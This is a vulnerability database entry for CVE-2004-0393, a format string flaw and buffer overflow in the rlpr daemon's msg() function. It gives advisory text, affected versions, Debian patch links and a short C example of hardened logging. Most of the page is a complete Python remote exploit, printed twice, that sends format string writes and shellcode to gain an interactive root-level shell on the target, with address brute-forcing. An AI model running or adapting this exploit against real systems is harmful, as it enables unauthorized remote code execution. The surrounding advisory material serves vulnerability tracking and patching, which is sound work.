CVE-2004-0393
CVSS 10.0
Published: 2004-12-06 00:00:00
Revised: 2016-10-17 22:44:57

[Original] Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in a buffer that can not be resolved, which is provided to the syslog function.


[CNNVD] Rlpr msg() Function Multiple Vulnerabilities (CNNVD-200412-033)

        
        rlpr is an lpd printing tool that does not use /etc/printcap.
        The msg() function included in rlpr has a format string flaw and a buffer overflow flaw; a local or remote attacker can exploit them to execute arbitrary commands with the privileges of the rlprd process.
        The first problem is that msg() performs no filtering when it calls syslog() to log a message, so submitted format string data can corrupt memory. The second is that msg() lacks sufficient bounds checking on its input, which can lead to a buffer overflow. Carefully constructed input can execute arbitrary commands with the privileges of the rlprd process (remote) or of root (local).
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:rlpr:rlpr:2.0.4
cpe:/a:rlpr:rlpr:2.0.2
cpe:/a:rlpr:rlpr:2.0.3
cpe:/a:rlpr:rlpr:2.0.1
cpe:/a:rlpr:rlpr:2.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0393
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0393
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-033
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=108810992313652&w=2
(UNKNOWN)  BUGTRAQ  20040624 Rlpr Advisory
http://www.debian.org/security/2004/dsa-524
(VENDOR_ADVISORY)  DEBIAN  DSA-524
http://www.securityfocus.com/bid/10578
(VENDOR_ADVISORY)  BID  10578
http://xforce.iss.net/xforce/xfdb/16453
(VENDOR_ADVISORY)  XF  rlpr-msg-format-string(16453)

- Vulnerability information

Rlpr msg() Function Multiple Vulnerabilities
Critical  Input validation
2004-12-06 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        Debian
        ------
        The vendor has released an upgrade to fix this security issue; download it from the vendor's site:
        rlpr rlpr 2.0 2 on Debian GNU/Linux 3.0 (woody): fixed package rlpr_2.02-7woody1, one build per architecture:
        alpha:   http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_alpha.deb
        arm:     http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_arm.deb
        i386:    http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_i386.deb
        ia64:    http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_ia64.deb
        hppa:    http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_hppa.deb
        m68k:    http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_m68k.deb
        mips:    http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_mips.deb
        mipsel:  http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_mipsel.deb
        powerpc: http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_powerpc.deb
        s390:    http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_s390.deb
        sparc:   http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_sparc.deb

- Vulnerability information (307)

rlpr <= 2.04 msg() Remote Format String Exploit (EDBID:307)
linux remote
2004-06-25 Verified
7290 jaguar
N/A
# by jaguar
#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib

class rlprd:
	fd = None
	pad = 2

	#00000000  31DB              xor ebx,ebx
	#00000002  F7E3              mul ebx
	#00000004  B003              mov al,0x3
	#00000006  80C304            add bl,0x4
	#00000009  89E1              mov ecx,esp
	#0000000B  4A                dec edx
	#0000000C  CC                int3
	#0000000D  CD80              int 0x80
	#0000000F  FFE1              jmp ecx

	# read(4, esp, -1); jmp ecx
	lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
	lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
	# dup2 shellcode(4->0,1,2)
	lnx_stage_two  = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04"
	lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
	# execute /bin/sh
	lnx_stage_two += "\x90" * 100
	lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68"
	lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
	lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80"

	targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ]

	bruteforce = 0

	def __init__(self, host, os, target, port=7290):
		self.host = host
		self.port = port

		set = 0
		if(os == "linux"):
			set = 1
			self.stage_one = self.lnx_stage_one
			self.stage_two = self.lnx_stage_two

		if(set == 0):
			print "Unknown OS"
			os._exit()

		self.os = os

		if(target == 0):
			self.bruteforce = 1
		else:
			self.args = self.targets[target]

	def wl16(self, write_byte):
		write_byte += 0x10000
		self.already_written %= 0x10000
		padding = (write_byte - self.already_written) % 0x10000
		if(padding < 10):
			padding += 0x10000

		self.already_written += padding

		return padding

	def connect(self):
		#if self.fd is not None:
		#	self.fd.close()
		#	self.fd = None

		self.fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
		self.fd.connect((self.host, self.port))

	def exploit(self, where, what):
		if(not self.fd or self.fd is None): self.connect()
		self.already_written = len('gethostbyname(')

		#print "# of nops: %d\n" % (23 - len(self.readsc))

		exploit = "x" * self.pad
		self.already_written += self.pad

		exploit += struct.pack("<l", where)
		exploit += struct.pack("<l", where + 2)
		self.already_written += 8

		l = self.wl16(what & 0xffff)
		fill = "%1$" + str(l) + "u"
		exploit += fill

		exploit += "%7$hn"

		l = self.wl16(what >> 16)
		fill = "%1$" + str(l) + "u"
		exploit += fill

		exploit += "%8$hn"

		#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
		#print "[*] Stage 1 length: %d" % len(self.stage_one)

		#time.sleep(5)
		try:
			self.fd.send(exploit + self.stage_one + "\n")
			self.fd.send(self.stage_two)
			time.sleep(1)
			self.fd.send("echo spawned; uname -a; id -a;\n")
			print "Recieved: " + self.fd.recv(1024)
		except:
			self.fd.close()
			self.fd = None
			print "\tFailed @ 0x%08x" % what
			return 0

		remote = telnetlib.Telnet()
		remote.sock = self.fd
		print "[*] You should now have a shell"
		remote.interact()
		os.exit(0)

	def force(self, where, high, lo):
		for i in range(high, lo, -8):
			r.exploit(where, i)

	def run(self):
		if(self.bruteforce):
			print "Bruteforcing.."
			#print "not implemented yet"
			#os._exit(1)
			for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
				print "Trying: 0x%08x" % i
				self.force(i, 0xbffffa00, 0xbffff9c0)

		#self.exploit(self.args[1], self.args[2])

if __name__ == '__main__':
	if(len(sys.argv) != 4):
		print "%s host [linux] targetid"
		print "- 0 to brute force"
		print "- 1 custom compile"
		os._exit(0)

	print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
	r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
	#r.exploit(0x0804c418, 0xbffff9e8)
	#r.force(0x0804c418, 0xbffffa00, 0xbffff800)
	r.run()


# milw0rm.com [2004-06-25]

- Vulnerability information (24223)

Rlpr 2.0 msg() Function Multiple Vulnerabilities (EDBID:24223)
linux remote
2004-06-19 Verified
0 jaguar@felinemenace.org
N/A
source: http://www.securityfocus.com/bid/10578/info

It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access.

The application is affected by a format string vulnerability. This vulnerability presents itself due to insufficient sanitization of user-supplied data through the 'msg()' function.

The 'msg()' function is also affected by a buffer overflow vulnerability. This issue occurs due to insufficient boundary checking and may also be exploited to gain unauthorized access to a vulnerable computer. 

rlpr versions 2.04 and prior are affected by these issues.

#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib

class rlprd:
	fd = None
	pad = 2 

	#00000000  31DB              xor ebx,ebx
	#00000002  F7E3              mul ebx
	#00000004  B003              mov al,0x3
	#00000006  80C304            add bl,0x4
	#00000009  89E1              mov ecx,esp
	#0000000B  4A                dec edx
	#0000000C  CC                int3
	#0000000D  CD80              int 0x80
	#0000000F  FFE1              jmp ecx
	
	# read(4, esp, -1); jmp ecx
	lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
	lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
	# dup2 shellcode(4->0,1,2)
	lnx_stage_two  = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04" 
	lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
	# execute /bin/sh	
	lnx_stage_two += "\x90" * 100
	lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68"
	lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
	lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80"

	targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ] 
		
	bruteforce = 0

	def __init__(self, host, os, target, port=7290):
		self.host = host
		self.port = port

		set = 0
		if(os == "linux"):
			set = 1
			self.stage_one = self.lnx_stage_one
			self.stage_two = self.lnx_stage_two

		if(set == 0):
			print "Unknown OS"
			os._exit()

		self.os = os
		
		if(target == 0):
			self.bruteforce = 1
		else:	
			self.args = self.targets[target]

	def wl16(self, write_byte):
		write_byte += 0x10000
		self.already_written %= 0x10000
		padding = (write_byte - self.already_written) % 0x10000
		if(padding < 10):
			padding += 0x10000

		self.already_written += padding

		return padding

	def connect(self):
		#if self.fd is not None:
		#	self.fd.close()
		#	self.fd = None

		self.fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
		self.fd.connect((self.host, self.port))
	
	def exploit(self, where, what):
		if(not self.fd or self.fd is None): self.connect()
		self.already_written = len('gethostbyname(')

		#print "# of nops: %d\n" % (23 - len(self.readsc))

		exploit = "x" * self.pad
		self.already_written += self.pad

		exploit += struct.pack("<l", where)
		exploit += struct.pack("<l", where + 2)
		self.already_written += 8		

		l = self.wl16(what & 0xffff)
		fill = "%1$" + str(l) + "u"
		exploit += fill

		exploit += "%7$hn"
		
		l = self.wl16(what >> 16)
		fill = "%1$" + str(l) + "u"
		exploit += fill

		exploit += "%8$hn"

		#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
		#print "[*] Stage 1 length: %d" % len(self.stage_one)

		#time.sleep(5)
		try:
			self.fd.send(exploit + self.stage_one + "\n")
			self.fd.send(self.stage_two)
			time.sleep(1)
			self.fd.send("echo spawned; uname -a; id -a;\n")
			print "Recieved: " + self.fd.recv(1024)
		except:
			self.fd.close()
			self.fd = None 
			print "\tFailed @ 0x%08x" % what
			return 0

		remote = telnetlib.Telnet()
		remote.sock = self.fd
		print "[*] You should now have a shell"
		remote.interact()
		os.exit(0)

	def force(self, where, high, lo):
		for i in range(high, lo, -8):
			r.exploit(where, i)

	def run(self):
		if(self.bruteforce):
			print "Bruteforcing.."
			#print "not implemented yet"
			#os._exit(1)
			for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
				print "Trying: 0x%08x" % i
				self.force(i, 0xbffffa00, 0xbffff9c0)

		#self.exploit(self.args[1], self.args[2])

if __name__ == '__main__':
	if(len(sys.argv) != 4):
		print "%s host [linux] targetid"
		print "- 0 to brute force"
		print "- 1 custom compile"
		os._exit(0)

	print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
	r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
	#r.exploit(0x0804c418, 0xbffff9e8)
	#r.force(0x0804c418, 0xbffffa00, 0xbffff800)
	r.run()

		

- Vulnerability information

7195
rlpr msg() Format String Error
Local Access Required, Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

rlpr contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered due to a format string error in the msg() function. This flaw may lead to a loss of integrity.

- Timeline

2004-06-19 Unknown
Unknown Unknown

- Solution

Upgrade to version 2.05 or higher, as it has been reported to fix this vulnerability. In addition, Debian has released a patch to address this vulnerability.

- Vulnerability information

Rlpr msg() Function Multiple Vulnerabilities
Input Validation Error 10578
Yes No
2004-06-19 12:00:00 2009-07-12 05:16:00
The format string issue was discovered by jaguar@felinemenace.org. The buffer overflow issue was disclosed by Debian.

- Affected program versions

rlpr rlpr 2.0 4
rlpr rlpr 2.0 3
rlpr rlpr 2.0 2
rlpr rlpr 2.0 1
rlpr rlpr 2.0

- Vulnerability discussion

It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access.

The application is affected by a format string vulnerability. This vulnerability presents itself due to insufficient sanitization of user-supplied data through the 'msg()' function.

The 'msg()' function is also affected by a buffer overflow vulnerability. This issue occurs due to insufficient boundary checking and may also be exploited to gain unauthorized access to a vulnerable computer.

rlpr versions 2.04 and prior are affected by these issues.
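
The two flaws in msg() described above (and in the CNNVD summary at the top of this page) are the classic double-format pattern: user text is rendered into a fixed buffer without a bound, and the rendered buffer is then handed to syslog() as its format. The following is an added illustration of the hardened shape, not rlpr's code; the vulnerable shape in the comment is reconstructed from the advisory text and from the "gethostbyname(" prefix the published exploit counts from, and the function names and the 256-byte buffer are assumptions made for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/*
 * Vulnerable shape of msg() as the advisories describe it, kept as a
 * comment for contrast (a build with -Werror=format-security refuses the
 * syslog line below, which is a cheap build-time check for this whole
 * bug class):
 *
 *     char buf[256];
 *     vsprintf(buf, fmt, ap);   // unbounded: a long hostname overflows buf
 *     syslog(LOG_ERR, buf);     // buf is now the format: %n in it writes memory
 */

/* Formats into out[] with a hard bound. Returns 1 if the whole message fit,
 * 0 if it was truncated; out[] is NUL-terminated either way. */
int format_log_line(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    if (n < 0) {               /* encoding error: emit nothing rather than garbage */
        out[0] = '\0';
        return 0;
    }
    return (size_t)n < outlen;
}

/* The call site the advisories describe: the peer-supplied hostname that
 * gethostbyname() could not resolve gets logged. The hostname is only ever
 * an argument to a literal format, and syslog() receives the constant "%s",
 * so rendered text is never re-read as a format. The truncation flag is
 * returned so a caller can treat abnormally long names as suspicious.
 * (Function names and the buffer size are assumptions for this example.)
 */
int log_unresolved_host(const char *host, char *out, size_t outlen)
{
    int fit = format_log_line(out, outlen, "gethostbyname(%s) failed", host);

    syslog(LOG_ERR, "%s", out);
    return fit;
}
```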

- Exploitation

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit has been provided by jaguar@felinemenace.org.

- Solution

Debian has released an advisory (DSA 524-1) to address these issues. Please see the referenced advisory for more information about obtaining fixes.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.


rlpr rlpr 2.0 2
